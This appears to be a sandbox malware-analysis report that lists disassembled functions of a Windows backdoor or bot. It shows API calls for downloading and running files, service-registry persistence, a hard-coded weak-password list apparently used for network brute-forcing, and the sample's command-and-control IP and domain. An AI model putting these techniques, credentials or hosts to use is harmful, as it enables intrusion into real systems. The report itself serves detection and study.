Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B

ExitProcess.KERNEL32 ref: 00403F4A

Strings

e, xrefs: 00403C6F
WS2_32.dll, xrefs: 004038DF
l, xrefs: 00403C44
KERNEL32.dll, xrefs: 004038F1
E, xrefs: 00403F8B
o, xrefs: 00403FB7
C, xrefs: 00403FB3
c, xrefs: 00403FF3
u, xrefs: 00403F9B
URLDownloadToFileA, xrefs: 00403D52, 00403D55
S, xrefs: 00403FCF
T, xrefs: 00403F87
e, xrefs: 00403FE3
r, xrefs: 00403FE7
i, xrefs: 00403C2F
r, xrefs: 00403F9F
o, xrefs: 00403FC7
lstrcatA, xrefs: 004038EC
t, xrefs: 004038A5
Y, xrefs: 00403F7F
%s%s, xrefs: 00403E8F
l, xrefs: 004038B5
s, xrefs: 00403FFB
r, xrefs: 0040389D
GetTempPathA, xrefs: 004038CB
r, xrefs: 00403FC3
e, xrefs: 00403C50
t, xrefs: 00403FBF
w, xrefs: 0040397E
n, xrefs: 00403FAB
n, xrefs: 00403FBB
i, xrefs: 00403FEF
M, xrefs: 00403F8F
kernel32.dll, xrefs: 004038D0
C, xrefs: 00403F97
e, xrefs: 00403FF7
\, xrefs: 00403FDB
e, xrefs: 004038A9
e, xrefs: 00403C58
i, xrefs: 004038A1
t, xrefs: 00403FAF
\, xrefs: 00403FFF
urlmon.dll, xrefs: 00403D48, 00403D4B
S, xrefs: 00403F7B
e, xrefs: 00403C60
e, xrefs: 00403FD3
n, xrefs: 00403C73
o, xrefs: 00403C67
l, xrefs: 00403FCB
F, xrefs: 004038AD
closesocket, xrefs: 004038DA
e, xrefs: 00403FA7
S, xrefs: 00403FDF
r, xrefs: 00403C4C
%c%c%c%c%ccn.exe, xrefs: 00403D28
p, xrefs: 00403C6B
x, xrefs: 00403C5C
i, xrefs: 004038B1
p, xrefs: 00403C40
o, xrefs: 00403C48
r, xrefs: 00403FA3
\, xrefs: 00403F93
v, xrefs: 00403FEB
e, xrefs: 00403C38
Defghi Klmnopqr Tuv, xrefs: 00403A2D, 00403C8C, 00403E49, 00403E6A, 00403E87, 00403F50, 00403F6D
%s%s, xrefs: 00403F75
W, xrefs: 00403899
S, xrefs: 00403F83
x, xrefs: 00403C3C
., xrefs: 00403C54
kernel32.dll, xrefs: 00403894
e, xrefs: 004038B9
t, xrefs: 00403FD7

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressProc$lstrcpynmemset$Mutex$_mbscpywsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShelllstrlenstrcspn$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSystemThreadTickVariableWindowatoiconnectmemcpysendsetsockoptsocketsprintfstrncpystrstr
String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
API String ID: 1435032172-2364854850
Opcode ID: e18265d271f6721ab9e9e9466f504cf459dc78a50ec6928034f8974f6ee0d570
Instruction ID: 357b4b9f15481a77607b06fd34d37290313e3d44ecd54a07aa5cfd399732b663
Opcode Fuzzy Hash: e18265d271f6721ab9e9e9466f504cf459dc78a50ec6928034f8974f6ee0d570
Instruction Fuzzy Hash: 65329871D042C8EEEB11DBA4CD48BDE7FB96B15305F0400A9E184B7292C7BE5A58CB79

Function 004055BC Relevance: 131.5, APIs: 27, Strings: 48, Instructions: 204
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004055D8
GetProcAddress.KERNEL32(00000000), ref: 004055E1
LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 004055F1
GetProcAddress.KERNEL32(00000000), ref: 004055F4
LoadLibraryA.KERNEL32(ADVAPI32.dll,RegisterServiceCtrlHandlerA), ref: 004055FF
GetProcAddress.KERNEL32(00000000), ref: 00405602
SetServiceStatus.SECHOST(00000000,004090B8), ref: 00405655
Sleep.KERNELBASE(000001F4), ref: 00405663
LoadLibraryA.KERNEL32(0000004B,?), ref: 004056EF
GetProcAddress.KERNEL32(00000000), ref: 004056F2
LoadLibraryA.KERNEL32(KERNEL32.dll,Get), ref: 0040574A
GetProcAddress.KERNEL32(00000000), ref: 0040574D
LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 0040578A
GetProcAddress.KERNEL32(00000000), ref: 0040578D
CreateMutexA.KERNELBASE(00000000,00000000,Defghi Klmnopqr Tuv), ref: 00405796
exit.MSVCRT ref: 004057A7
wsprintfA.USER32 ref: 004057D2
CreateThread.KERNELBASE(00000000,00000000,Function_00002DD5,00000000,00000000,00000000), ref: 004057FF
Sleep.KERNELBASE(000001F4), ref: 00405806
WSAStartup.WS2_32(00000202,?), ref: 0040581E
CreateThread.KERNELBASE(00000000,00000000,Function_00005182,00000000,00000000,00000000), ref: 0040582A
WSAStartup.WS2_32(00000202,?), ref: 00405838
CreateThread.KERNELBASE(00000000,00000000,Function_000051E3,00000000,00000000,00000000), ref: 00405844
WaitForSingleObject.KERNEL32(00000000,000000FF,Function_0000387C,00000000), ref: 00405859
CloseHandle.KERNEL32 ref: 00405865
closesocket.WS2_32 ref: 00405871
Sleep.KERNELBASE(0000012C), ref: 00405883

Strings

E, xrefs: 004056D8
WS2_32.dll, xrefs: 004055D3
RegisterServiceCtrlHandlerA, xrefs: 004055F6
x, xrefs: 0040577F
A, xrefs: 00405783
r, xrefs: 0040575B
r, xrefs: 004056E0
r, xrefs: 0040572F
t, xrefs: 00405767
t, xrefs: 00405777
h, xrefs: 0040572B
C, xrefs: 00405752
KERNEL32.dll, xrefs: 00405689
e, xrefs: 004056C0
u, xrefs: 00405773
I, xrefs: 0040573F
t, xrefs: 00405723
d, xrefs: 00405743
r, xrefs: 004056DC
e, xrefs: 0040575F
d, xrefs: 0040573B
r, xrefs: 00405717
closesocket, xrefs: 004055CE
e, xrefs: 0040577B
e, xrefs: 0040576B
G, xrefs: 004056BC
Get, xrefs: 00405703, 0040570A
a, xrefs: 00405763
L, xrefs: 004056C8
e, xrefs: 0040571B
u, xrefs: 0040570F
C, xrefs: 00405706
t, xrefs: 004056C4
e, xrefs: 00405733
M, xrefs: 0040576F
r, xrefs: 00405713
n, xrefs: 0040571F
ADVAPI32.dll, xrefs: 004055E3, 004055ED, 004055FB
s, xrefs: 004056D0
Defghi Klmnopqr Tuv, xrefs: 00405609, 0040578F
a, xrefs: 004056CC
r, xrefs: 004056E8
hra%u.dll, xrefs: 004057CC
T, xrefs: 00405727
o, xrefs: 004056E4
SetServiceStatus, xrefs: 004055E8
a, xrefs: 00405737
t, xrefs: 004056D4

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$Create$SleepThread$Startup$CloseHandleMutexObjectServiceSingleStatusWaitclosesocketexitwsprintf
String ID: A$ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$G$Get$I$KERNEL32.dll$L$M$RegisterServiceCtrlHandlerA$SetServiceStatus$T$WS2_32.dll$a$a$a$closesocket$d$d$e$e$e$e$e$e$h$hra%u.dll$n$o$r$r$r$r$r$r$r$s$t$t$t$t$t$u$u$x
API String ID: 2081735817-3768298475
Opcode ID: 0829bc5678a68e0c4557f189000b03db2788a54d9899d5a03469cd2d06e6fe48
Instruction ID: 2b90b7f98aae210445e73ef680a1d9401666750c7211a7faab133c9ec65b4e0f
Opcode Fuzzy Hash: 0829bc5678a68e0c4557f189000b03db2788a54d9899d5a03469cd2d06e6fe48
Instruction Fuzzy Hash: F3913670C082C8EDEB11D7A8DD4CBDEBFB99B15348F0440A9E54476292C7BD5A48CB7A

Function 00405348 Relevance: 121.0, APIs: 26, Strings: 43, Instructions: 211
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,RegQueryValueExA), ref: 00405365
GetProcAddress.KERNEL32(00000000), ref: 0040536E
LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405379
GetProcAddress.KERNEL32(00000000), ref: 0040537C
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 0040538B
GetProcAddress.KERNEL32(00000000), ref: 0040538E
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 0040539D
GetProcAddress.KERNEL32(00000000), ref: 004053A0
RegOpenKeyExA.KERNELBASE(80000002,?,00000000,000F003F,?), ref: 00405464
memset.MSVCRT ref: 00405483
RegQueryValueExA.KERNELBASE(?,00000049,00000000,00000000,?,?), ref: 004054C6
RegCloseKey.KERNELBASE(?), ref: 004054D5
GetFileAttributesA.KERNELBASE(?), ref: 004054DF
CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054FD
GetFileSize.KERNEL32(00000000,00000000), ref: 0040550C
GlobalAlloc.KERNELBASE(00000040,00000000), ref: 0040551C
ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00405533
GlobalFree.KERNEL32(?), ref: 00405540
CloseHandle.KERNEL32(00000000), ref: 00405547
CloseHandle.KERNELBASE(00000000), ref: 00405552
BeginUpdateResourceA.KERNEL32(?,00000000), ref: 0040555C
UpdateResourceA.KERNEL32(00000000,0000000A,00000066,00000000,?,?), ref: 0040557B
lstrlen.KERNEL32(Defghi Klmnopqr Tuv), ref: 00405585
UpdateResourceA.KERNEL32(?,0000000A,00000065,00000000,Defghi Klmnopqr Tuv,00000001), ref: 00405596
EndUpdateResourceA.KERNEL32(?,00000000), ref: 0040559F
GlobalFree.KERNEL32(?), ref: 004055AF

Strings

Y, xrefs: 004053B5
t, xrefs: 004053F5
r, xrefs: 0040541D
S, xrefs: 004053B1
u, xrefs: 004053D1
\, xrefs: 00405411
C, xrefs: 004053E9
r, xrefs: 004053F9
r, xrefs: 004053D9
e, xrefs: 00405409
t, xrefs: 004053E5
t, xrefs: 0040540D
C, xrefs: 004053CD
e, xrefs: 004053DD
n, xrefs: 004053E1
S, xrefs: 00405405
r, xrefs: 004053D5
lstrcpyA, xrefs: 0040537E
l, xrefs: 00405401
RegQueryValueExA, xrefs: 0040535F
c, xrefs: 00405429
T, xrefs: 004053BD
\, xrefs: 004053C9
lstrcatA, xrefs: 00405390
RegCloseKey, xrefs: 00405370
v, xrefs: 00405421
e, xrefs: 00405419
n, xrefs: 004053F1
e, xrefs: 0040542D
KERNEL32.dll, xrefs: 00405383
S, xrefs: 004053B9
S, xrefs: 00405415
i, xrefs: 00405425
ImagePath, xrefs: 0040549F
ADVAPI32.dll, xrefs: 0040535A, 00405364, 00405375
KERNEL32.dll, xrefs: 00405395
Defghi Klmnopqr Tuv, xrefs: 0040543F, 0040544A, 00405584, 0040558D
\, xrefs: 00405435
o, xrefs: 004053ED
E, xrefs: 004053C1
M, xrefs: 004053C5
s, xrefs: 00405431
o, xrefs: 004053FD

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressFileLibraryLoadProcResourceUpdate$CloseGlobal$FreeHandle$AllocAttributesBeginCreateOpenQueryReadSizeValuelstrlenmemset
String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$ImagePath$KERNEL32.dll$KERNEL32.dll$M$RegCloseKey$RegQueryValueExA$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lstrcatA$lstrcpyA$n$n$o$o$r$r$r$r$s$t$t$t$u$v
API String ID: 2023098254-1497069993
Opcode ID: 5691daac4824de2b6841b4b3c6b5525a01462119fc2637b3c2951bed404fc92c
Instruction ID: 857f389ec30b06542d6cc4631e69be42d6d6ae2a8b7d483b04e891210c00ca0b
Opcode Fuzzy Hash: 5691daac4824de2b6841b4b3c6b5525a01462119fc2637b3c2951bed404fc92c
Instruction Fuzzy Hash: 14816070D042C8EEEF119BA4DC48BEFBEB99F15344F040065F544B62A1D7B94A48CB79

Function 00402DD5 Relevance: 91.2, APIs: 8, Strings: 44, Instructions: 166
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402A59: WSAStartup.WS2_32(00000202,?), ref: 00402A6E

gethostname.WS2_32(?,00000080), ref: 00402FBA
gethostbyname.WS2_32(?), ref: 00402FCF
memset.MSVCRT ref: 00402FFA
memcpy.MSVCRT(?,00000000,?,?,00000000,00000010), ref: 0040300E
memset.MSVCRT ref: 00403049
sprintf.MSVCRT ref: 0040306F
Sleep.KERNELBASE(000000C8), ref: 00403098
WSACleanup.WS2_32 ref: 004030ED

Strings

123, xrefs: 00402F5D
5201314, xrefs: 00402F21
woaini, xrefs: 00402F78
%d.%d.%d.%d, xrefs: 00403069
admin, xrefs: 00402DEF
alex, xrefs: 00402DFD
88888, xrefs: 00402EF9
root, xrefs: 00402F0D
alex, xrefs: 00402F3F
caonima, xrefs: 00402F17
12345678, xrefs: 00402ED1
qwerty, xrefs: 00402E9F
guest, xrefs: 00402DF6
NULL, xrefs: 00402F53
111, xrefs: 00402E8B
bbbbbb, xrefs: 00402EE5
enter, xrefs: 00402E6D
abc123, xrefs: 00402EB3
asdfgh, xrefs: 00402F35
test, xrefs: 00402DE8
hack, xrefs: 00402E66
game, xrefs: 00402E20
xpuser, xrefs: 00402E5F
root, xrefs: 00402E35
time, xrefs: 00402E4A
1314520, xrefs: 00402F2B
memory, xrefs: 00402EBD
baby, xrefs: 00402F71
home, xrefs: 00402EC7
123, xrefs: 00402E27
love, xrefs: 00402EDB
administrator, xrefs: 00402DE1, 00403075, 004030AF
yeah, xrefs: 00402E51
home, xrefs: 00402E04
user, xrefs: 00402E19
test, xrefs: 00402EA9
movie, xrefs: 00402F7F
angel, xrefs: 00402F49
money, xrefs: 00402E58
123456, xrefs: 00402E95
love, xrefs: 00402E0B
password, xrefs: 00402E81
asdf, xrefs: 00402F67
movie, xrefs: 00402E43

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: memset$CleanupSleepStartupgethostbynamegethostnamememcpysprintf
String ID: %d.%d.%d.%d$111$123$123$123456$12345678$1314520$5201314$88888$NULL$abc123$admin$administrator$alex$alex$angel$asdf$asdfgh$baby$bbbbbb$caonima$enter$game$guest$hack$home$home$love$love$memory$money$movie$movie$password$qwerty$root$root$test$test$time$user$woaini$xpuser$yeah
API String ID: 2657193355-195746125
Opcode ID: 05354827fa881561b6b3f17ce7718c656727c28b50fa67908cbf439bfa371650
Instruction ID: ae78371e899d60bf5f5d828a76061139e061b110f9393b7dc49d63d24438a906
Opcode Fuzzy Hash: 05354827fa881561b6b3f17ce7718c656727c28b50fa67908cbf439bfa371650
Instruction Fuzzy Hash: 3C81FAB2D012599BDB21DF95C9486DEBBB4BB05308F50C0BBD5497B2A1C7B84B88CF58

Function 004059F4 Relevance: 75.3, APIs: 5, Strings: 38, Instructions: 84
libraryregistryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
GetProcAddress.KERNEL32(00000000), ref: 00405A10
_mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
_mbscat.MSVCRT ref: 00405AD7
RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00405AF6

Strings

S, xrefs: 00405AA2
e, xrefs: 00405A96
E, xrefs: 00405A4E
C, xrefs: 00405A76
\, xrefs: 00405AC2
r, xrefs: 00405AAA
S, xrefs: 00405A46
S, xrefs: 00405A92
SYSTEM\CurrentControlSet\Services\, xrefs: 00405A37
M, xrefs: 00405A52
i, xrefs: 00405AB2
e, xrefs: 00405ABA
u, xrefs: 00405A5E
\, xrefs: 00405A9E
t, xrefs: 00405A82
c, xrefs: 00405AB6
v, xrefs: 00405AAE
T, xrefs: 00405A4A
r, xrefs: 00405A86
e, xrefs: 00405AA6
n, xrefs: 00405A6E
l, xrefs: 00405A8E
e, xrefs: 00405A6A
S, xrefs: 00405A32
RegCloseKey, xrefs: 004059FF
C, xrefs: 00405A5A
o, xrefs: 00405A7A
t, xrefs: 00405A9A
o, xrefs: 00405A8A
t, xrefs: 00405A72
ADVAPI32.dll, xrefs: 00405A04
Y, xrefs: 00405A3A
\, xrefs: 00405A56
Defghi Klmnopqr Tuv, xrefs: 00405AD1
r, xrefs: 00405A62
r, xrefs: 00405A66
n, xrefs: 00405A7E
s, xrefs: 00405ABE

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadOpenProc_mbscat_mbscpy
String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$M$RegCloseKey$S$S$S$S$SYSTEM\CurrentControlSet\Services\$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$t$t$t$u$v
API String ID: 1994725845-1712674794
Opcode ID: fe1cd4cbf34c5d281c3dbb1e64282f5bf3c4517e78142a43a9fbfdfd1bffe10b
Instruction ID: 35d77256bc8034983bafe4ceb320269e5385723e05cff16902321712d41d725d
Opcode Fuzzy Hash: fe1cd4cbf34c5d281c3dbb1e64282f5bf3c4517e78142a43a9fbfdfd1bffe10b
Instruction Fuzzy Hash: EA410F11D0C2C9E9EB12D2A8C9097DEBFB54B16749F0840D9D2847A2D2C2FE575887B6

Function 0040336C Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 98
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,htons,76F8F550,76F90BD0,00000000), ref: 00403389
GetProcAddress.KERNEL32(00000000), ref: 00403392
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
GetProcAddress.KERNEL32(00000000), ref: 004033A0
_mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
strstr.MSVCRT ref: 004033E0
memset.MSVCRT ref: 004033F9
strcspn.MSVCRT ref: 00403410
strncpy.MSVCRT ref: 0040341B
strcspn.MSVCRT ref: 0040342D
atoi.MSVCRT(?), ref: 00403437
socket.WS2_32(00000002,00000001,00000000), ref: 00403468
connect.WS2_32(00000000,00000002,00000010), ref: 00403477

Strings

120.48.34.233, xrefs: 004033E9, 004033F8, 0040341A, 00403455
WS2_32.dll, xrefs: 0040337E, 00403388, 00403399
htons, xrefs: 00403383
EhETHRcLHRAXHREQEAkLEwsTQw==, xrefs: 004033B8
closesocket, xrefs: 00403394

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcstrcspn$_mbscpyatoiconnectmemsetsocketstrncpystrstr
String ID: 120.48.34.233$EhETHRcLHRAXHREQEAkLEwsTQw==$WS2_32.dll$closesocket$htons
API String ID: 2255542143-3763905265
Opcode ID: d1af9a050918730770f70f886657c6e6b1d211d4c2088a602517dbf745d6cec9
Instruction ID: 6aa5ca56811b2828efdf987d7b23adbf84b4b011ef7c06a256cd014a8a3b1787
Opcode Fuzzy Hash: d1af9a050918730770f70f886657c6e6b1d211d4c2088a602517dbf745d6cec9
Instruction Fuzzy Hash: D931B871900218BBDB10ABB49D49FDF7A6CAF05314F104577F609F72E1DA785A448BA8

Function 00406A48 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00406A75
__p__fmode.MSVCRT ref: 00406A8A
__p__commode.MSVCRT ref: 00406A98
__setusermatherr.MSVCRT ref: 00406AC4
_initterm.MSVCRT ref: 00406ADA
__getmainargs.MSVCRT ref: 00406AFD
_initterm.MSVCRT ref: 00406B0D
GetStartupInfoA.KERNEL32(?), ref: 00406B4C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00406B70
exit.MSVCRT ref: 00406B80
_XcptFilter.MSVCRT ref: 00406B92

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
Instruction ID: ce64524e5db3081824dfc069b3bde325727510d573eb5451e936e5ebab442623
Opcode Fuzzy Hash: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
Instruction Fuzzy Hash: 0F417EB1900364AFCB249FA5DD85AAA7BB8EB09710B20013FF592B72E1D7785940CB18

Function 00406C10 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
GetProcAddress.KERNEL32(00000000), ref: 00406C23
inet_addr.WS2_32(?), ref: 00406C30
gethostbyname.WS2_32(?), ref: 00406C3B

Strings

WS2_32.dll, xrefs: 00406C17
gethostbyname, xrefs: 00406C12

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcgethostbynameinet_addr
String ID: WS2_32.dll$gethostbyname
API String ID: 688652319-1612545655
Opcode ID: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
Instruction ID: fa684150f8c7a78303bc788c4e7da3796caaeb6c4f1dce52f515438040d0683d
Opcode Fuzzy Hash: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
Instruction Fuzzy Hash: 2DE09A393042009BE3049B26FE48DAA3BE8DAC9722305407AF942E3260C334C8428A68

Function 004050CA Relevance: 9.0, APIs: 6, Instructions: 25
sleepsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202), ref: 004050DB
CreateThread.KERNELBASE(00000000,00000000,0040407C,00000000,00000000,00000000), ref: 004050ED
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050FB
CloseHandle.KERNEL32 ref: 00405107
closesocket.WS2_32 ref: 00405113
Sleep.KERNELBASE(0000012C), ref: 0040511E

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
String ID:
API String ID: 964154963-0
Opcode ID: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
Instruction ID: a79ab9a2dfc38e3776cf33d79ac1821f4f8275b6afc8926fd1558f3327be2bb1
Opcode Fuzzy Hash: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
Instruction Fuzzy Hash: CAE0C972406260FBD3216BA1AE4DDAB3E68FB0A3A1F144235F359B50F5DB340854CBA9

Function 00405126 Relevance: 9.0, APIs: 6, Instructions: 25
sleepsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202), ref: 00405137
CreateThread.KERNELBASE(00000000,00000000,004048AA,00000000,00000000,00000000), ref: 00405149
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405157
CloseHandle.KERNEL32 ref: 00405163
closesocket.WS2_32 ref: 0040516F
Sleep.KERNELBASE(0000012C), ref: 0040517A

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
